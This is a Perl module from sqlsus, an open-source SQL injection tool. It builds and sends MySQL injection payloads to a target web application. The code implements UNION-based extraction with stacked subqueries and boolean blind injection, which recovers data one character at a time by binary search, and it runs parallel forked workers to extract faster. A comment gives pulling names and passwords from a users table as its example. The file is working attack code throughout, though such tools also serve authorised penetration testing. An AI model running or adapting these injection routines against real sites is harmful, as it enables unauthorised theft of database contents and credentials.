package select;

# This file is part of sqlsus
#
# Copyright (c) 2008,2009 sativouf
# http://sqlsus.sf.net/
#
# Licensed under the GPL version 2.0 license.
# See LICENSE file or
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.html

use strict;
use warnings;

use POSIX;
use DBI;
use IO::Socket;
use IO::Handle;

# eye candiness
use constant INTERNAL => 1;
use constant IN_INTERVAL => 1;
use constant PREPEND => 1;
use constant NO_PREPEND => 0;

my $select_start_regex = qr/(?:ALL|DISTINCT|DISTINCTROW|HIGH_PRIORITY|STRAIGHT_JOIN|SQL_SMALL_RESULT|SQL_BIG_RESULT|SQL_BUFFER_RESULT|SQL_CACHE|SQL_NO_CACHE|SQL_CALC_FOUND_ROWS)/i;
my $select_end_regex = qr/(?:FROM|WHERE|GROUP BY|ASC|HAVING|ORDER BY|ASC|LIMIT|PROCEDURE|INTO)/i;
my $hex_separator = "0x5";
my $hex_separator_mini = "0x7";
my $separator = chr(0x5);
my $separator_mini = chr(0x7);


##################################
#-- inject the sql
sub inject {
	my $sql = shift;
	my $url;

	if ($conf::hex_encode_strings) { 
		$sql =~ s/(['"])\1//g;
		$sql =~ s/(['"])(.*?)\1/&functions::string_to_hex($2)/eg 
	}

	if ($sql =~ /^http/) {
		# we are asked to inject a full url, not just a SQL statement
		$url = $sql;
	} else {
		$url = $conf::url_start . $sql;
	}

	if ($conf::post) { 
		my %form;

		my $temp_url = $url;
		$temp_url =~ s/.*?\?//;
		my $last_key;
		for (split(/&/, $temp_url)) {
			if (/([^=]*)=(.*)/) {
				$form{$1} = $2;
				$last_key = $1;
			}
		}
		$form{$last_key} .= $conf::url_end;
		$url =~ s/\?.*//;
		return &functions::get_url($url, \%form); 
	} else {
		return &functions::get_url($url . $conf::url_end);
	}
}

##################################
#-- cut the query into 3 parts :
# the command / the last part / the content of the command (as an array)
# ex : SELECT ALL Name,Passwd from users where Name like "aze"
# SELECT ALL / from users where Name like "aze" / (Name, Passwd)
#
sub cut_query {
	my $query = shift;
	my @query_items_array = ();
	# Remove spaces near commas, for easier parsing and shorter query
	$query =~ s/(\s+)?,(\s+)?/,/g;
	if ($query =~ /^\s*(SELECT(?:\s+$select_start_regex*)*)(.*?)($select_end_regex\s+[^)]+)?$/i) {
		my ($query_start, $query_end, $query_items) = ($1, $3, $2);
		for (($query_start, $query_end, $query_items)) {
			if (not defined $_) { $_ = " "; next; }
			s/^\s+//;
			s/\s+$//;
			s/(\s){2,}/$1/;
		}
		my @to_join = ();
		my $open_brackets = 0; 
		my $open_simple_quote = 0; 
		my $open_double_quote = 0; 

		for (split /,/, $query_items) {
			# Dont push to items array if we are inside at least one parenthesis
			# or if we are inside quotes
			$open_brackets += () = /\(/g;
			$open_brackets -= () = /\)/g;
			# basic quote counting
			$open_simple_quote += () = /'/g;
			$open_double_quote += () = /"/g;
			
			push @to_join, $_;
			if (not $open_brackets and ($open_simple_quote % 2 + $open_double_quote % 2 == 0)) {
				push @query_items_array, join ',', @to_join;
				@to_join = ();
			}   
		}   
		# shorten the query
		$query_end =~ s/\s*(!=|>=|<=|=|==)\s*/$1/g;
		# If the current database differs from the one opened by the target web app
		if (defined $main::target{database} and $main::database ne $main::target{database} and $query_end =~ /^from/i) {
			my $from_query = $query_end;
			my $last = "";
			if ($from_query =~ s/\s+($select_end_regex.*)$//i) {
				$last = $1;
			}
			my @from = split /\s*,\s*/, $from_query;
			$from[0] =~ s/from\s+//i;
			for (@from) {
				# dual has a special meaning, do not change
				next if /dual/i;
				# prepend table with database if no dot inside the table
				s/^([^\.]+)$/$main::database.$1/;
			}
			$query_end = "FROM " . join (",", @from) . " $last";
		}
		return (( $query_start, $query_end, @query_items_array ));
	} 
}

##################################
# Inject an inband SQL SELECT query :
sub inband_query {
	my $query = shift;
	# recup cut pour injecter substring
	my $sub = 1;
	my ($query_start, $query_end, @query_items_array) = &cut_query ($query);

	return (0, undef) if $main::interrupt;

	my $query_items = "IFNULL(" . join (',0x6),IFNULL(', @query_items_array) . ",0x6)";
	if (scalar @query_items_array > 1) {
		$query_items = "CONCAT_WS($hex_separator_mini,$query_items)";
	}

	my $query_mid = join ",", @conf::columns;
	$query_mid =~ s/1/BINARY CONCAT($hex_separator,($query_start $query_items $query_end),$hex_separator)/;

	# shorten sql
	$query_mid =~ s/\s+($select_end_regex)\s+/ $1 /g;
	$query_mid =~ s/\s*([\)\(])\s*/$1/g;

	my $res;
	my $hits;
	my $to_inject = "$conf::union_select $query_mid";	
	$to_inject =~ s# #/**/#g if $conf::convert_spaces;
	do {
		return (0, undef) if $main::interrupt;
		$res = &inject($to_inject);
		$hits++;
	} while (&functions::is_error_code($res->code));

	if ($res->content !~ /$separator/) {
		return (0, undef);
	}
	my @ret = ();
	if ($res->content =~ /[^$separator]*$separator([^$separator]+)$separator.*/) {
		# x appended to avoid split discarding the last element, if this one is ""
		@ret = split /$separator_mini/, $1 . "x";
		$ret[-1] =~ s/x$//;
	}
	if ($conf::debug) { print "*** " . (join '/', @ret) . "\n" }
	if ($#ret == $#query_items_array) {
		return ($hits, @ret);
	} else {
		if ($res->content =~ /You have an error in your SQL syntax; .* (.*?at line \d+)/) {
			print STDERR "SQL ERROR : $1\n";
		} else {
			print STDERR "The number of columns in the request (" . scalar @query_items_array . ") differs from the number of columns returned (" . scalar @ret . ") !\n";
		}
		return (0, undef);
	}
}

##################################
# stack query, limit == num_stack, so there is no LIMIT statement in the $query_end
# Returns :
# The number of stacked queries
# The query itself

# Ex: select name,id from City limit 3
# X1 : hex_separator
# X2 : hex_separator_mini
# [X1]name1[X2]id1[X2]name2[X2]id2[X1]
sub stack_query {
	my ($start, $end, $substring_start, $substring_end, $query_start, $query_end, @query_items_array) = @_;
	my $next_stack_q;
	
	my $limit = $start;
	
	if ($conf::max_subqueries !~ /\d+/ or $conf::max_subqueries <= 0) {
		print STDERR "Warning: max_subqueries set to $conf::max_subqueries, changing to minimum value 1\n";
		$conf::max_subqueries = 1;
	}

	# Only allow max_subqueries subqueries at a time
	if ($end - $start > $conf::max_subqueries) {
		$end = $start + $conf::max_subqueries;
	}

	my $joined_query_items_array = "IFNULL(" . join (',0x6),IFNULL(', @query_items_array) . ",0x6)";

	# shorten the size of the stacked query to the max
	if (scalar @query_items_array > 1) {
		$next_stack_q = "($query_start CONCAT_WS($hex_separator_mini,$joined_query_items_array)$query_end LIMIT $limit,1)";
	} else {
		$next_stack_q = "($query_start $joined_query_items_array $query_end LIMIT $limit,1)";
	}

	my $stack_q = "";
	my $query_mid = "";
	my $stacked = 0;
	my $columns = join (",", @conf::columns);
	# -1 because one 1 is replaced by $query_mid in $columns later on
	# +1 because of the space after $conf::union_select
	my $min_len = length($conf::url_start) + length($conf::union_select) + $conf::convert_spaces*3 + length($conf::url_end) + length($columns);
		
	# shorten sql
	$next_stack_q =~ s/\s+($select_end_regex)\s+/ $1 /g;
	$next_stack_q =~ s/\s*([\)\(])\s*/$1/g;

	$next_stack_q =~ s# #/**/#g if $conf::convert_spaces;

	# keep previous state of the query in case we exceed max_sendable
	while (($stacked++ <= ($end - $start)) and (length("BINARY(CONCAT($hex_separator,CONCAT_WS($hex_separator_mini,$stack_q),$hex_separator))") + length($next_stack_q) + 1 + $min_len <= $conf::max_sendable) and ($limit++ < $end)) {
		$stack_q .= ",$next_stack_q";
		if (scalar @query_items_array > 1) {
			$next_stack_q = "($query_start CONCAT_WS($hex_separator_mini,${joined_query_items_array})$query_end LIMIT $limit,1)";
		} else {
			$next_stack_q = "($query_start ${joined_query_items_array}$query_end LIMIT $limit,1)";
		}

		# shorten sql
		$next_stack_q =~ s/\s+($select_end_regex)\s+/ $1 /g;
		$next_stack_q =~ s/\s*([\)\(])\s*/$1/g;

		$next_stack_q =~ s# #/**/#g if $conf::convert_spaces;
	}
	$stack_q =~ s/^,//;
	$columns =~ s/1/BINARY(CONCAT($hex_separator,CONCAT_WS($hex_separator_mini,$stack_q),$hex_separator))/;
	my $stacked_query = "$conf::union_select $columns";
	$stacked_query =~ s# #/**/#g if $conf::convert_spaces;

	return ($stacked-1, $stacked_query);
}


##################################
# Inject a stacked query
# Takes the number of stacked queries and the stacked query itself in argument
#
sub inj_stack_query {
	my ($items, $stacked_query) = @_;

	my $res;
	my $hits = 0;
	do {
		return (0, undef) if $main::interrupt;
		$res = &inject($stacked_query);
		$hits++;
	} while (&functions::is_error_code($res->code));

	return (0, $res->status_line) unless ($res->is_success);

	if ($res->content =~ /You have an error in your SQL syntax; .* (.*?at line \d+)/) {
		return (0, "SQL ERROR : $1");
	}
   	if ($res->content =~ /[^$separator]*$separator([^$separator]+)$separator.*/) {
		# x appended to avoid split discarding the last element, if this one is ""
        my @ret = split /$separator_mini/, $1 . "x";
		$ret[-1] =~ s/x$//;
		return ($hits, @ret);
	} else {
		return (0, undef);
	}
}

##################################
# Inject a query that returns more than one row
#
sub inband_mass_query {
	my $hits = 0;
	my $query = shift;
	my $table = shift;
	my @ret;

	my $row = 0;
	my $top_row = 9999999999;

	if ($query =~ /LIMIT\s+(\d+)(?:(?:,\s*)(\d+))?/i) {
		if (defined $2) {
			$row = $1;
			$top_row = $2 + $1;
		} else {
			$top_row = $1;
		}
		$query =~ s/LIMIT\s+(\d+)(,\d+)?//i;

	}
	my $num_rows = $top_row - $row;

	my ($a, $b, @header) = &cut_query($query);

	my $substring_start = 1;
	my $substring_end = $conf::max_returned;

	my $exit_code = 0;

	my $total_stacked = 0;
	my ($stacked, $stacked_query) = &stack_query($row, $top_row, $substring_start, $substring_end, $a, $b, @header);
	print STDERR "\rFetching rows up to " . ($total_stacked + $stacked);
	my ($status, @result) = &inj_stack_query(scalar @header, $stacked_query);
	if ($status == 0) {
		print STDERR "\r" . " "x30 . "\r";
		return (0, @result);
	}
	$hits += $status;

	if ($conf::debug) { print STDERR "[***]" . join ("/", @result) . "\n" }

	if (@result and $status) {
		if ($table eq INTERNAL) {
			push @ret, @result;
		} else {
			&db::insert_log($table, $row, scalar @header, @result);
		}
	}
	
	$total_stacked += $stacked;
	$row += $stacked;

	my $current_children = 0;

	# baby zombies killer
    $SIG{CHLD} = sub {
        while (my $child = waitpid(-1,WNOHANG)) {
            last if $child == -1;
            $current_children--;
        }
    };
		
	my $exit_loop = 0;
		
	local $SIG{'USR1'} = sub { $exit_loop = 1 };
	local $SIG{'USR2'} = sub { $hits++ };
	
	while ($num_rows > $total_stacked and not $exit_loop and (scalar @result == $stacked * scalar @header)) {
		last if $main::interrupt;
	
		($stacked, $stacked_query) = &stack_query($row, $top_row, $substring_start, $substring_end, $a, $b, @header);

		print STDERR "\rFetching rows up to " . ($total_stacked + $stacked);

		if ($table eq INTERNAL) {
			($status, @result) = &inj_stack_query(scalar @header, $stacked_query);
			$hits++;
			push @ret, @result;
			if ($conf::debug) { print STDERR "\n[***]" . join ("/", @result) . "\n" }
			if (not $status or (scalar @result != $stacked * scalar @header)) {
				last;
			}
		} else {
			while ($conf::processes == $current_children) {
				sleep .3;
				last if $main::interrupt;
			}
			if (fork()) {
				$current_children++;
			} else {
				($status, @result) = &inj_stack_query(scalar @header, $stacked_query);
				if ($status) {
					if ($conf::debug) { print STDERR "\n[***]" . join ("/", @result) . "\n" }
					&db::insert_log($table, $row, scalar @header, @result);
					for (1..$status) {
						# send $hits to parent
						kill USR2 => getppid();
					}
				} 
				if ((not $status) or (scalar @result != $stacked * scalar @header)) {
					kill USR1 => getppid();  
				}
				exit;
			}
		}

		$total_stacked += $stacked;
		$row += $stacked;
		
	} 
	if ($table ne INTERNAL) {
		# wait children
		while ($current_children) {
			sleep .3;
		}
	}
	print STDERR "\r" . " "x30 . "\r";

	return ($hits, @ret);
}

##################################
sub test {
	my $query = shift;

	print STDERR "Warning: not in blind mode, result may not be as expected\n" unless $conf::blind;

	my $res;
	my $hits = 0;

	do {
		return if $main::interrupt;
		$res = &inject("AND ($query)");
		$hits++;
	} while (&functions::is_error_code($res->code));

	push my (@header), $query;
	if (index($res->content, $conf::string_to_match) >= 0) {
		&functions::print_array_in_a_box($hits, \@header, ("Y"));
	} else {
		&functions::print_array_in_a_box($hits, \@header, ("N"));
	}
}



##################################
sub length_blind_item {
	my $query = shift;
	my $prepend = shift;
	my @test_values = shift;

	my @query_mid_test;
	my $result = "";

	my $max = 8;
	my $area;
	my $fast_start = 1;
	my $hits = 0;
	my $res;

	# test likely values first
	for my $value (@test_values) {
		last unless defined $value;
		return ($hits,0) if $main::interrupt;
		if ($prepend) {
			$res = &inject("AND LENGTH(($query))=$value");
		} else {
			$res = &inject("AND ($query)=$value");
		}
		$hits++;
		redo if (&functions::is_error_code($res->code));
		if (index($res->content, $conf::string_to_match) >= 0) {
			return ($hits, $value);
		} 
	}

	if ($prepend) {
		do {
			return ($hits,0) if $main::interrupt;
			$res = &inject("AND($query)IS NOT NULL");
			$hits++;
		} while (&functions::is_error_code($res->code));

		# result is NULL
		if (index($res->content, $conf::string_to_match) < 0) {
			return ($hits, -1);
		} 
	}

	while ($max < $conf::max_length or not $prepend) {
		return ($hits, 0) if $main::interrupt;
		if ($prepend) {
			$res = &inject("AND LENGTH(($query))<$max");
		} else {
			$res = &inject("AND ($query)<$max");
		}
		$hits++;
		if ($max > 16000000) {
			print STDERR "length_blind_item: hardcoded max_length (16M) exceeded\n" if $conf::debug;
			return ($hits, -1);
		}
		redo if &functions::is_error_code($res->code);

		# Consider usual values under 8, or likely under 16, or under 32..
		if ($fast_start) {
			if (index($res->content, $conf::string_to_match) >= 0) {
				$fast_start = 0;
			} else {
				$max *= 2;
			}
		}
		# We know the maximum value, now is time for the dichtomy guess
		if (not $fast_start) {
			my $low = ($max > 8) ? ($max / 2) : 0;
			my $high = $max;
			my $mid;

			while ($low < $high) {
				return ($hits, 6) if $main::interrupt;
				$mid = int ($low + (($high - $low) / 2));

				if ($prepend) {
					$res = &inject("AND LENGTH(($query))>$mid");
				} else {
					$res = &inject("AND ($query)>$mid");
				}

				$hits++;
				redo if &functions::is_error_code($res->code);

				if (index($res->content, $conf::string_to_match) > 0) {
					$low = $mid + 1;
				} else {
					$high = $mid;
				}
			}
			return ($hits, $low);
		} 
	}
	print STDERR "Error: max_length exceeded\n" if $conf::debug;
	return ($hits, -1);
}

##################################
sub char_blind_item {
	my $query = shift;
	my $pos = shift;
	my $in_interval = shift;
	my @chars_to_try = @_;

	my $low = 0;
	my $high = $#chars_to_try;
	my $mid;
	my $hits = 0;

	while ($low < $high) {
		return ($hits, 6) if $main::interrupt;
		$mid = int ($low + (($high - $low) / 2));

		my $res = &inject("AND ORD(MID(($query),$pos,1))>$chars_to_try[$mid]");
		$hits++;
		redo if &functions::is_error_code($res->code);
		
		if (index($res->content, $conf::string_to_match) > 0) {
			$low = $mid + 1;
		} else {
			$high = $mid;
		}
	}
	if (not $in_interval and ($low == 0 or $low == $#chars_to_try)) {
		my $res = &inject("AND ORD(MID(($query),$pos,1))=$chars_to_try[$low]");
		$hits++;
		if (index($res->content, $conf::string_to_match) > 0) {
			return ($hits, $chars_to_try[$low]);
		} else {
			return ($hits, 6);
		}
	} else {
		return ($hits, $chars_to_try[$low]);
	}
}

##################################
# Prints information on blind query progress
sub print_progress {
	my ($done, $todo) = @_;
	
	my $percent = int $done / $todo * 100;
	print STDERR "\r[" . "*"x(floor($percent/5)) . " "x(20-floor($percent/5)) . "] $done / $todo ($percent%)";
}

##################################
# try to match a regex against the query
# return the range associated with the regex if successful, conf::default_range otherwise
sub match_regex {
	my $query = shift;

	my $i = 0;
	my $range;
	my $res;
	my $hits = 0;

	while (my $rx = $conf::regex_rlike[$i++]) {
		do {
			last if $main::interrupt;
			$res = &inject("AND(($query)NOT RLIKE BINARY '$rx' AND($query)IS NOT NULL AND LENGTH(($query))!=0)");
			$hits++;
		} while (&functions::is_error_code($res->code));

		if (index($res->content, $conf::string_to_match) < 0) {
			$range = $conf::regex_rlike[$i];
			last;
		}
		$i++;
	}
	$range = $conf::default_range unless $range;
	return ($hits, $range);
}

##################################
sub get_blind_limit {
	my $query = shift;

	my $row = 0;
	my $top_row;

	my ($query_start, $query_end, @items) = &cut_query($query);
	my @items_without_count = grep {!/count\(/i} @items;
	return (0, $query, 0, 1) unless @items_without_count;
	$query_end =~ s/LIMIT\s+\d+\s*(,\s*\d+)?//i;
	my $count_select = "$query_start COUNT(CONCAT(IFNULL(" . join(',0),IFNULL(', @items_without_count) . ",0)))$query_end";

	my ($hits, $length) = &length_blind_item($count_select, NO_PREPEND);
	# on mysql < 4.1.22, select count(123) returns 0 (otherwise, 1)
	# we are not testing for a count(NULL) since we use COUNT(IFNULL()), so other than for those early versions, we will never have 0.
	$length++ if $length == 0;

	$top_row = $length;

	if ($query =~ /LIMIT\s+(\d+)(?:(?:\s*,\s*)(\d+))?/i) {
		if (defined $2) {
			$row = $1;
			$top_row = $2 + $1 if ($2 + $1) < $length or $length <= 0;
		} else {
			$top_row = $1 if $1 < $length or $length <= 0;
		}
	}
	$query =~ s/LIMIT\s+\d+\s*(,\s*\d+)?//i;

	return($hits, $query, $row, $top_row);
}

##################################
sub get_hex_query {
	my $query = shift;
	my $item_num = shift;
	my $row = shift;

	my ($query_start, $query_end, @items) = &cut_query($query);
	$row += floor($item_num / scalar @items);
	
	my $i = $item_num % scalar @items;
	my $item = $items[$i];

	$query = $query_start . " ";

	if ($#items > 0) {
		$query .= "MID(CONCAT(IFNULL(" . join (',0x6),IFNULL(', @items) . ",0x6)),";

		if ($i != 0) {
			# IFNULL -> 1 because IFNULL(item, \x06)
			# and length(NULL) == NULL
			for (0..$i-1) { $query .= "IFNULL(LENGTH($items[$_]),1)+" }
		}
		$query .= "1,LENGTH($items[$i]))";
	} else {
		$query .= join (',', @items) . " ";
	}
	$query .= $query_end;

	$query = $1 if $query =~ /^\s*(.*?)\s*$/;
	$query = "$query LIMIT $row,1";
	return &functions::string_to_hex($query);
}

##################################
sub update_blind_result {
	my $table = shift;
	my $item_num = shift;
	my $items = shift;
	my $result = shift;

	my $row = floor($item_num / $items);
	my $index = $item_num % $items;

	&db::insert_item($table, $row, $index, $result);
}

##################################
sub get_spot_pos_to_ask {
	my %item_info = @_;

	# priorize first rows, espcially important if we are cloning
	for (sort { $item_info{$a}{num} <=> $item_info{$b}{num} } keys %item_info) {
		next unless $item_info{$_}{range};
		return ($_, $item_info{$_}{asked} + 1) unless ($item_info{$_}{asked} == $item_info{$_}{size});
	}
	return undef;
}


##################################
# Inject a BLIND SQL SELECT query :
sub blind_query {
	my $orig_query = shift;
	# optionnal argument, when we know how many rows will be returned.
	my $rows_returned = shift;

	my $hits;
	my $result;
	my @results;
	my @children;

	my $query = &expand_star($orig_query);

	my (undef,undef,@items) = &cut_query($query);
	my $table = &db::create_table($orig_query, @items);

	my ($h, $row, $top_row);
	if ($rows_returned) {
		$h = 0;
		$row = 0;
		$top_row = $rows_returned;
	} else {
		($h, $query, $row, $top_row) = &get_blind_limit($query);
	}

	$query =~ s/limit\s+\d+(\s*,\s*\d+)?\s*$//i;

	if (not defined $h) {
		print STDERR "Error: Cannot determine the size of the result for the query. Syntax error ? Forgot to \"start\" and \"use\" the correct database ?\n";
		return (0,undef);
	} elsif ($top_row == 0) {
		&db::insert_log($table, 0, scalar @items, ("\x06") x scalar @items);
		return ($h, $table);
	} elsif ($top_row == -1) {
		return (0,undef);
	}

	$hits += $h;

	my $rows_to_fetch = $top_row - $row;
	my $items_to_fetch = (scalar @items) * $rows_to_fetch;

	return (0, undef) if ($items_to_fetch <= 0);

	if ($conf::processes !~ /\d+/ or $conf::processes <= 0) {
        print STDERR "Warning: processes set to $conf::processes, changing to minimum value 1\n";
        $conf::processes = 1;
    }

	my $free_processes = $conf::processes;
	my %item_info;

	# should be initialized to what user asked
	my $fetched_items = 0;
	my $item_num = 0;
	my $hex_query;
	# done to avoid memory leak by storing obsolete data
	my @free_spots = (1..$conf::processes);

	socketpair(CHILD, PARENT, AF_UNIX, SOCK_STREAM, PF_UNSPEC)
	    or die "socketpair: $!";

	# Used to be sure that we don't race the children
	socketpair(CHILD_ACK, PARENT_ACK, AF_UNIX, SOCK_STREAM, PF_UNSPEC)
	    or die "socketpair: $!";

	CHILD->autoflush(1);
	PARENT->autoflush(1);

	CHILD_ACK->autoflush(1);
	PARENT_ACK->autoflush(1);

	# launch the children
	for (1..$conf::processes) {
		my $pid = fork();
		if (not defined $pid) {
			print STDERR "\nError: cannot fork. Try to reduce \"processes\" (set processes ..)\n";
			# kill the children
			for (@children) {
				kill TERM => $_;
				waitpid($_, 0);
			}
			return 0;
		} elsif ($pid == 0) {
			close PARENT;
			close PARENT_ACK;
			while (1) {
				#
				# this is a brute force process
				#
				my $buf = <CHILD>;
				exit unless $buf;
				print CHILD_ACK "ACK\n";
				chomp($buf);

				# we are asked to brute force a char
				if ($buf =~ /^CHAR/) {
					my (undef, $item_num, $pos, $chars_to_try, $query) = split /;/, $buf;
					my $in_range = ($chars_to_try ne $conf::default_range);
					$query = &functions::hex_to_string($query);
					print STDERR "<$$> CHAR item_num=$item_num/pos=$pos/chars_to_try=$chars_to_try/$query\n" if $conf::debug;
#					print STDERR time . "<$$> received CHAR item_num=$item_num/pos=$pos/\n";
					my ($hits, $char) = &char_blind_item($query, $pos, $in_range, split (/,/, $chars_to_try));
					# send result to the master
#					print STDERR "<$$> sending CHAR;$hits;$item_num;$pos;$char\n";
					print CHILD "CHAR;$hits;$item_num;$pos;$char\n";
				# we are asked to try to match a RE and find the length
				} elsif ($buf =~ /^RELEN/) {
					my $total_hits = 0;
					my (undef, $item_num, $query) = split /;/, $buf;
					$query = &functions::hex_to_string($query);
					print STDERR "<$$> RELEN $item_num/$query\n" if $conf::debug;
#					print STDERR time . "<$$> received RELEN $item_num/\n";
					my ($hits, $range) = &match_regex($query);
					$total_hits += $hits;
					# if hex, good chances the size is 32
					my @likely_size;
					push @likely_size, 32 if ($range eq join (',',(48..57,97..102)) or $range eq join (',',(48..57,65..70)));
					($hits, my $item_length) = &length_blind_item($query, PREPEND, @likely_size);
					$total_hits += $hits;
#					print STDERR "<$$> sending RELEN;$total_hits;$item_num;$item_length;$range\n";
					print CHILD "RELEN;$total_hits;$item_num;$item_length;$range\n";
				}
			}
			# just in case
			exit;
		}
		push @children, $pid;
	}
	close CHILD;
	close CHILD_ACK;

	&print_progress($fetched_items, $items_to_fetch);
	while ($fetched_items != $items_to_fetch) {
		last if $main::interrupt;
	
		if ($item_num == ($fetched_items + $conf::processes) or $item_num == $items_to_fetch) {
			# char guess
			while ($free_processes and defined &get_spot_pos_to_ask(%item_info)) {
				last if $main::interrupt;
				my ($spot, $pos) = &get_spot_pos_to_ask(%item_info);
				# send next task to children
#				print STDERR time . " PARENT sends CHAR;$spot;$pos\n";
				print PARENT "CHAR;$spot;$pos;$item_info{$spot}{range};$item_info{$spot}{hex_query}\n";
				my $buf = <PARENT_ACK>;
				$item_info{$spot}{asked}++;
				$free_processes--;
			} 
		}
		
		# size guess
		while ($item_num != $items_to_fetch and $free_processes) {
			$hex_query = &get_hex_query($query, $item_num, $row);
			my $spot = shift @free_spots;
			$item_info{$spot}{num} = $item_num;
			$item_info{$spot}{hex_query} = $hex_query;
#			print STDERR time . " PARENT sends RELEN;$spot\n";
			# send next task to children
			print PARENT "RELEN;$spot;$hex_query\n";
			my $buf = <PARENT_ACK>;
			$item_num++;
			$free_processes--;
		}

#		print STDERR "\n--[ $free_processes | $item_num | $fetched_items | $items_to_fetch ]--\n";
		# all the children are busy, now wait an answer
		chomp(my $buf = <PARENT>);
#		print STDERR "received $buf\n";
		# RELEN;$hits;$item_num;$item_length;$range
		if ($buf =~ /^RELEN;(\d+);(\d+);(-?\d+);(\S+)/) {
			$hits += $1;
			my $spot = $2;
			my $size = $3;
			if ($size <= 0) {
				$fetched_items++;
				if ($size == 0) {
					&update_blind_result($table, $item_info{$spot}{num}, scalar @items, '');
				# size < 0
				} else {
					&update_blind_result($table, $item_info{$spot}{num}, scalar @items, "\x06");
				}
				&print_progress($fetched_items, $items_to_fetch);
				push @free_spots, $2;
			} else {
				# init item_info for this item
				$item_info{$2}{size}  = $size;
				$item_info{$2}{range} = $4;
				$item_info{$2}{chars} = "\x06" x $size;
				$item_info{$2}{answered} = 0;
				$item_info{$2}{asked} = 0;
			}
			# CHAR;$hits;$item_num;$pos;$char
		} elsif ($buf =~ /^CHAR;(\d+);(\d+);(\d+);(\S+)/) {
			$hits += $1;
			my $spot = $2;
			substr($item_info{$spot}{chars}, $3 - 1, 1, chr($4));
			$item_info{$spot}{answered}++;
			if ($item_info{$spot}{size} == $item_info{$spot}{answered}){
				$fetched_items++;
				&update_blind_result($table, $item_info{$spot}{num}, scalar @items, $item_info{$2}{chars});
				&print_progress($fetched_items, $items_to_fetch);
				push @free_spots, $spot;
			}
		}
		$free_processes++;
	}
	# kill the children
	for (@children) {
        kill TERM => $_;
        waitpid($_, 0);
    }
	
	close PARENT;
	close PARENT_ACK;
	
	print STDERR "\r" . " "x50 . "\r";
	return ($hits, $table);
}

##################################
sub validate_blind_query {
	my $query = shift;

	my ($query_start, $query_end, @header) = &cut_query($query);

	my $row = 0;
	
#	if ($query =~ /LIMIT\s+(\d+)(?:(?:,\s*)(\d+))?/i) {
#		$row = $1;
#		$row-- unless $2;
#	}

	$query_end =~ s/limit\s+(\d+)(?:(?:,\s*)(\d+))?$//i;
	my $res = &inject("AND ($query_start CONCAT(IFNULL(" . join(',0x6),IFNULL(', @header) . ",0x6))$query_end LIMIT 0,1)IS NOT NULL");
	if ((&functions::is_error_code($res->code)) or (index($res->content, $conf::string_to_match) <= 0)) {
#		print STDERR "Empty set\n";
		return 0;
	}
	return 1;
}


##################################
sub query {
	my $args = shift;
	my $internal = shift;
	# redirected from mass_query
	# dirty..
	my $redirected = shift;

	return 0 unless &expand_star($args);
	my ($hits, $table, @result);

	if ($conf::blind) {
		return 0 unless &validate_blind_query(&expand_star($args));
		if ($redirected) {
			($hits, $table) = &blind_query($args);
		} else {
			($hits, $table) = &blind_query($args,1);
		}
		$hits++ if $hits; # because of validate_blind_query
		if ($internal) {
			if ($hits) {
				@result = &db::table_to_array($table);
				&db::drop_table($table);
				return ($hits, @result);
			} else {
				return (0, undef);
			}
		} else {
			return ($hits, $table);
		}
	} else {
		my $query = &expand_star($args);
		my (undef, undef, @header) = &cut_query($query);

		($hits, @result) = &inband_query($query);
		if ($internal) {
			return ($hits, @result);
		} elsif ($hits) {
			my $result_table = &db::create_table($args, @header);
			&db::insert_log($result_table, 0, scalar @header, @result);
			return ($hits, $result_table);
		}
	}
}

##################################
sub mass_query {
	my $args = shift;
	my $internal = shift;

	return &query($args, $internal, 1) if $conf::blind;

	my $query = &expand_star($args);
	return 0 unless $query;
	my (undef, undef, @header) = &cut_query($query);

	my $temp_table;
	my $hits;
	my @result;

	if ($internal) {
		$temp_table = INTERNAL;
	} else {
		$temp_table = &db::create_table($args, @header);
	}

	($hits, @result) = &inband_mass_query($query, $temp_table);

	if ($internal) {
		return ($hits, @result);
	} else {
		return ($hits, $temp_table);
	}
}   


##################################
sub expand_star {
	my $query = shift;
	my ($a, $b, @header) = &cut_query($query);

	# expand "select * from ..." to column names
	if (grep { $_ eq '*' } @header) {
		# allow user to specify foreign database
		if ($b =~ /from (?:\w+\.)*(\w+)\s*.*$/i) {
			if (my $cols = join ',', &db::query("SELECT column_name FROM databases WHERE database_name = ? AND table_name = ?", $main::database, $1)) {
				$query =~ s/\*/$cols/;
			} else {
				print STDERR "Error : No columns found for table \"$1\"... try \"get columns $1\" first \n";
				return undef;
			} 
		}
	}
	return $query;
}

##################################
sub command {
	my $query = shift;
	my $internal = shift;

	my $select_one = 0;
	my ($hits, @result, $result_table);

	if (not $conf::blind and not @conf::columns) {
		print STDERR "Error : columns for UNION not set, set them in the configuration file or use \"start\" first\n";
		return 0;
	}

	if (not $main::target{database}) {
		print STDERR "Warning: target database not set, you may want to use \"start\" first\n";
	}

	$query =~ s/\s+$//;
	$query =~ s/^\s+//;

	# 2nd is a REALLY basic regex to catch : select "bla"
	if (($query =~ /^select1/i) or ($query !~ /^select .* from .*/i) or ($query =~ /limit\s+1$/i)) {
		$select_one = 1;
		$query =~ s/^select1/SELECT/i;
	}

	if ($select_one) { 
		($hits, $result_table) = &query($query, $internal);
	} else {
		($hits, $result_table) = &mass_query($query, $internal);
	}

	if ($hits) {
		&functions::print_table_in_a_box($hits, $main::logdb, $result_table);
	} else {
		print STDERR "Query failed. SQL error ?\n";
	}
	
	return $hits;
}

1
